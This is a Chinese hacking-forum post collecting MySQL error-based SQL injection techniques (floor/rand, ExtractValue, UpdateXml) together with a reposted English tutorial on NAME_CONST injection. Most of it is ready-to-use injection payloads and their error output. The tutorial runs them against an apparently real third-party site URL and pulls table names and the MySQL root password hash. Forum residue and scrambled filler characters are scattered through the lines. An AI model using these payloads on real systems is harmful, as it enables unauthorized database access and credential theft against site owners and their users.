找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3151|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:9 N7 Q# Q& Q3 H9 s* H2 ^
首先进行正常查询:

mysql> select * from article where id = 1;
5 S" o' S  @7 o5 J" m+—-+——-+———+
9 \) Q- L3 I, f- {| id | title | content |
" E9 ]3 f6 [8 Y* b3 ]1 B5 J7 i" G+—-+——-+———+
! X; e$ z& @: b( V9 y/ i|  1 | test  | do it   |
4 f& _6 p' x) R$ l9 v+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
6 @6 t! Z# D4 i' fERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。' Q* Q$ ^* N6 _$ R
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
6 v! u3 A1 M! kERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));. K, ?8 k4 U3 y' Z
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
. |1 U, f6 v! C/ l2 q- q4 b9 r- t6 J测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–2 G& v* ?3 q( G) q, _
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’


8 g8 \% ~0 U7 k, T" Q
- x: I# P4 S* A% K7 G

再收集:

& u# A9 R6 G3 c2 V4 S0 i' I3 z
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) / D" G9 b/ X4 {3 k
! P) {: ?& U* k7 T
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
1 h. I; a8 A" H; j7 t7 G& [0 Q$ x7 Q. a: l$ D. s; q
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c). C. y8 L: e6 g$ L
( \% [9 \* |$ ~/ q' H" k- O
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 5 I( h0 u9 u, x. v+ p) P
9 g. g4 O/ O7 i- Q9 ~
MYSQL高版本报错注入技巧-利用NAME_CONST注入
, e! P# P: e$ i' O- uIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
0 c3 d% m5 V; i1 P
, I4 L1 @8 \0 \# j/ l( Q. |; J+ b
相关信息
3 _/ j4 h5 W, F% i9 R
! U/ p, x$ a1 Y' ]  M1 R/ O- X( s0 fNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.4 l! c! }  o" W

8 c0 d& J/ o( Q5 lCode:: v6 X& _9 t, ~" a& g6 ]
NAME_CONST(DATA, VALUE)
* N, O( w& R; O2 s
) l# S, w) g# t" ]( e1 M7 @Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants., r+ s. e1 g  h$ @
$ S) t' y6 b% i0 C
SELECT NAME_CONST('TEST', 1)1 m9 z# v2 W+ A9 l  d7 H

5 F$ }3 ~& X6 c( e, d3 f
3 e8 c6 v/ w; W6 s
# m5 [0 V- \# W5 L6 W& V6 q4 ||---------------|
; k) a4 L* ]9 F|     TEST      |& R6 o! e0 n) i5 T, i
|               |# ^% _! i6 _' {; R7 V
|---------------|4 z9 ~8 F7 w3 ?* o: I$ T
|       1       |" m+ \$ ?4 ~' J: @7 t
|               |& ^# _9 }- i6 Y
|---------------|
0 V+ ]+ i9 @. }. d4 w

; m5 L7 h/ c) w$ ~. N% l3 L  F0 G3 S  @

5 h9 ]- E9 S; i! L2 D3 h# m5 B6 ~
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
' H1 r6 I0 x6 a1 {. n# N# Q4 JIntro to MySQL Variables( g2 B2 `7 n; R$ d' R/ r, G( Y  ~7 O

0 P! C; j6 e, |8 g' U0 x- Z/ iOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.( C. G' p5 C" a  U& P

5 f& _  V1 I+ C2 B4 |0 i4 OCode:# m) T% W0 G% H3 F
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261( a* S0 D( R- K2 ?" m3 T9 @5 P3 `# a5 X8 t
& F/ P3 h: ?" L# B% e8 X

! C( {. }0 B( D/ l) W% t3 L- e8 {, r, F2 T; A* ~5 g, ~+ y6 d6 y
) F7 u# c6 C6 `
6 ], _6 s/ L/ l/ {
Code:
: S* w3 s+ p+ i) q) x0 tand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--) X' G- D: z7 l8 ?4 S0 u

: E1 B1 y6 \- ?" N; n/ E1 d$ E% l  q  l; d
VAR = Your MySQL variable.
' a- D* ?- c  ]5 ]+ U1 _! @
  l5 n4 k9 }2 |" eMySQL 5.1.3 Server System Variables
/ L$ N2 n4 |+ b2 e- v1 ]- Q+ l4 q, R7 a4 b5 V
Let's try it out on my site..
/ @  Z. B0 n+ m# i
/ S+ L0 L  c! ~2 ^% n4 YCode:
8 S) E6 X. o3 G- I: v! ~http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--  A1 C# Q( g1 y. ?1 j' J) c6 ]0 b% K

4 q% U1 j8 J+ sErroruplicate column name '5.0.27-community-nt'/ n! H) b2 s& d& J/ |, }

1 e6 P% V7 W) D- B& e6 Q$ M: b6 j* h8 u/ i

! N  v7 Z+ g9 S2 G

" x# D7 k# Z8 K7 U2 ]: ~
+ A, a2 H; W3 ]. BNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
2 m7 h$ B' u- T* N! ]* v
6 X9 F( J+ T3 G, A# W& k: g% |Data Extraction
3 `% l0 u' W' }; R  O1 F  \! q, O& f/ B  X# Z
Code:
; L  Y& ]: X6 X+ {+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--3 J2 S  s( ?9 u  V! D: d

; o* @. R5 W( K9 \; V1 `1 U- R. S0 |
We should get a duplicate column 1 error...+ S" v8 y. C  C1 v

+ B/ U  _  w( [# YCode:7 P) h! [+ v4 F& u* r
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
0 C5 a/ R9 `0 N2 C' J  w
; a) ?- m% k1 e5 l& k# U8 ]) ~$ gErroruplicate column name '12 D) M& ]. j, U
5 f! V) f1 X+ x& M0 P

$ A/ C% m7 s1 i7 O% e/ f" X$ _/ K& M# H
( l6 z% O# d4 L/ j

3 ]1 V9 T) _' H) f& ?8 d
  }& o* V2 J& p$ D# |  WNow let's get the tables out this bitch..( |: x- W2 A/ I3 i* U# q6 T
' i3 n+ v6 _" p: r3 H
Code:) [* I$ q( F( v; h# Z( |, w* x+ z
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--/ v  ~& z8 O/ c1 p" c. u6 B/ u$ L
4 r% k# k8 }# }$ |

) G) P* l2 L9 F6 u+ ULet's see if it works here, if it does, we can go on and finish the job.% B3 m& L9 {( n9 V1 J! {5 D
, F7 Y: {9 b: R; K* D
Code:
! {% V( u* V& @5 @* ]! rhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
( |8 ^) u1 g/ g& |3 v( ]" t* ^) O: g  Y  A1 @7 N
; O, e& F, u5 @$ m: w4 n, Q- }
Erroruplicate column name 'com_admanage
+ w; z! J; J7 Z( e
7 c, x4 q7 _0 X+ x! r. E/ U
9 u8 s5 A9 Z$ e' J# i7 \

2 G% s* s# _* ]3 f4 D" u, T/ i  I9 \% }& V' S! Z
" B2 N2 I9 B% ~: B, b+ O2 x

% ^4 N: Y( a( y5 JNow I'm going to be lazy and use mysql.user as an example, just for the sake of time." h2 D6 W& H! T

3 f) W4 H& x9 ~% K+ U! zLet's get the columns out of the user table..
' U# |3 c2 E3 {% A. F0 V8 m/ T
! z7 f( S% o: t/ G7 n8 D8 ECode:7 q5 g! V+ |+ G$ O1 r( l- w
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--7 r0 _, `9 E& `
+ F& E! f0 q3 {4 q2 p# |6 C+ Z

5 _7 B! n% W5 @9 j. ~So mine looks like this, and I get the duplicate column name 'Host'.
/ {) i+ a% z& Z, j2 j6 [1 k+ y
Code:
, \) ?  D! `8 `2 a; |3 \7 hhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
6 p5 f5 _! I, q8 h
2 L0 n3 B( U& F5 sErroruplicate column name 'Host'. a6 S$ y' P* J1 {5 U# V4 n

. X/ X, Q8 }; X. ]: k" l" I, e% k9 }2 d( R
, K  {+ U3 p3 D7 E+ S

& Z% H- R3 K5 V4 q- l6 }

" V! `  R9 i  O4 h2 o; E% s* L8 l, ~! w0 y# U2 f( Z- L
Woot, time to finish this bitch off.& a( ^2 U9 G  w2 r1 g) M, @
( K: [* r9 X7 ^& L4 f$ Y4 O% d
Code:
) i8 ?8 S+ S5 |/ ~8 e+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--+ }' x" s8 @; [9 a5 E7 R

" y/ w( Q/ J. t  n6 f1 B( ]0 l( V: F0 `3 X" ]2 @
So mine looks like this.... _) v+ ]! y& Q9 f) E, X
) b& \# f" }6 n7 K) ^( ]: f& C
Code:( J- T1 V  s9 S3 {4 X
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--. a  Z3 o' \+ N4 t) O, w

1 \: U7 h& {6 c4 |; KErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'1 M0 X; ~2 M) U' B7 j( k& W
% Y0 h- a# x/ d/ V: o
) e7 f# f9 z% m: G  V0 `3 z

8 i: B6 u6 p% ]# a3 H* j: `. _1 |. V$ y8 m5 f( E0 n: i2 c' ^

; k" q" e0 j& V( K. q% w
9 a! b3 g% P: u6 r4 O- ^. k, qAnd there we have it, thanks for reading.

3 P/ A7 {3 H+ ]1 E' j/ q6 {9 z4 V- z. }
& V8 T3 ?( x) E4 D  T- c' O5 q7 n1 K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表